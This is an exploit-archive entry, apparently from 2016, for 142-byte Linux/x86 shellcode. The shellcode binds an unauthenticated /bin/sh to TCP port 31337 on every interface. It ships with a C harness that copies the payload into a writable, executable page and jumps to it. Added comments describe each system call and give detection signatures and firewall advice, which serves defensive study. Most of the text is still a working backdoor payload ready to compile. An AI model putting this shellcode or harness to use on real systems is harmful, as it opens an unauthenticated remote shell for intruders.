Linux/x86 portbind shellcode ( host: INADDR_ANY, port: 31337 ) 142 bytes



EKU-ID: 5647 CVE: OSVDB-ID:
Author: tesla_ Published: 2016-06-27 Verified: Verified


#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/mman.h>
  
/*
 * Linux/x86: 142 bytes portbind shellcode ( host: INADDR_ANY, port: 31337 )
 *
 * tesla_ (gandung@ppp.cylab.cmu.edu)
 */
/*
 * 142-byte position-independent payload for 32-bit Linux (int 0x80 ABI),
 * stored as a NUL-terminated string literal.
 *
 * What the bytes do, in order (useful when triaging a sample or writing a
 * detection):
 *   1. socketcall (eax = 0x66), sub-call 1: socket(2, 1, 6), i.e. an
 *      AF_INET / SOCK_STREAM / TCP socket.
 *   2. socketcall sub-call 2: bind() to a 16-byte sockaddr with family 2,
 *      port bytes 7a 69 (31337 in network order) and address 0
 *      (INADDR_ANY, every interface).
 *   3. socketcall sub-calls 4 and 5: listen() with backlog 0, then accept().
 *   4. dup2 (eax = 0x3f) three times, copying the accepted descriptor onto
 *      fds 0, 1 and 2.
 *   5. execve (eax = 0x0b) of the stack-built string "//bin/sh", followed
 *      by exit (eax = 0x01) should execve return.
 *
 * Defender notes:
 *   - The listener performs no authentication and is reachable on all
 *     interfaces; a default-deny inbound host firewall policy keeps it
 *     from being reachable remotely.
 *   - Observable artefacts: an unexpected process listening on TCP/31337,
 *     and a /bin/sh process whose stdin/stdout/stderr are one socket.
 *   - Static anchors for signatures: the port push "\x66\x68\x7a\x69" and
 *     the two pushes that spell "//bin/sh"
 *     ("\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69").
 */
char *shellcode = "\x31\xc0\x6a\x06\x6a\x01\x6a\x02\x89\xe1\x31\xc0\x31\xdb\xb0\x66\xb3\x01\xcd\x80"
                  "\x89\xc2\x31\xc0\x31\xdb\x53\x66\x68\x7a\x69\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52"
                  "\x89\xe1\x31\xc0\x31\xdb\xb0\x66\xb3\x02\xcd\x80\x31\xc0\x31\xdb\x50\x52\x89\xe1"
                  "\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x31\xdb\x50\x50\x52\x89\xe1\xb0\x66\xb3\x05\xcd"
                  "\x80\x50\x31\xc9\x5b\xb0\x3f\xcd\x80\x53\x41\x5b\xb0\x3f\xcd\x80\x53\x41\x5b\xb0"
                  "\x3f\xcd\x80\x31\xc0\x31\xdb\x50\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d"
                  "\x54\x24\x0c\x8d\x4c\x24\x08\x8d\x1c\x24\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01"
                  "\xcd\x80";
  
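/*
 * Test harness for the payload in `shellcode`: reports its length, copies it
 * into an anonymous read/write/execute page and transfers control to it.
 *
 * Returns -1 when the self-check fails, the payload does not fit in the
 * mapping, or the mapping cannot be created. The payload's last system calls
 * are execve and exit, so the final return is not expected to be reached
 * once the copy runs.
 */
int main(void) {
        enum { MAP_LEN = 4096 };        /* size of the executable scratch page */
        size_t len = strlen(shellcode); /* computed once; size_t, not int */
        size_t i;
        int null_bytes = 0;
        char *payload;

        /*
         * NOTE(review): this scan is bounded by strlen(), which stops at the
         * first NUL byte, so the counter can never become non-zero here. An
         * embedded NUL would only show up as a reported length shorter than
         * the 142 bytes stated in the file header.
         */
        for ( i = 0; i < len; i++ ) {
                if ( shellcode[i] == '\x00' ) {
                        null_bytes++;
                }
        }

        printf("[*] %i null bytes detected.\n", null_bytes);
        if ( null_bytes != 0 ) {
                printf("[-] Payload is not clean. Bailing...\n");

                return ( -1 );
        }
        printf("[+] Payload is clean. Ready to execute.\n");

        /* %zu matches size_t; passing size_t to %i is undefined behaviour. */
        printf("[*] Payload length: %zu bytes.\n", len);
        printf("[*] Executing the buffer...");
        /* No trailing newline above: flush so the line is not lost when the
         * process image is replaced. */
        fflush(stdout);

        /* Never copy more than the mapping can hold. */
        if ( len > MAP_LEN ) {
                fprintf(stderr, "[-] Payload larger than mapping. Bailing...\n");

                return ( -1 );
        }

        /*
         * A writable + executable anonymous mapping. W^X enforcement (for
         * example an SELinux execmem denial) refuses this request, and runtime
         * monitors commonly alert on it, so the result must be checked before
         * it is written to.
         */
        payload = mmap(NULL, MAP_LEN, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
        if ( payload == MAP_FAILED ) {
                perror("mmap");

                return ( -1 );
        }

        memcpy(payload, shellcode, len);

        /*
         * Transfer control to the copy.
         * NOTE(review): the template names %eax while the operand uses the
         * generic "r" constraint; the statement is kept exactly as published.
         */
        __asm__ __volatile__("call      *%%eax"
                             :
                             : "r"(payload));

        return ( 0 );
}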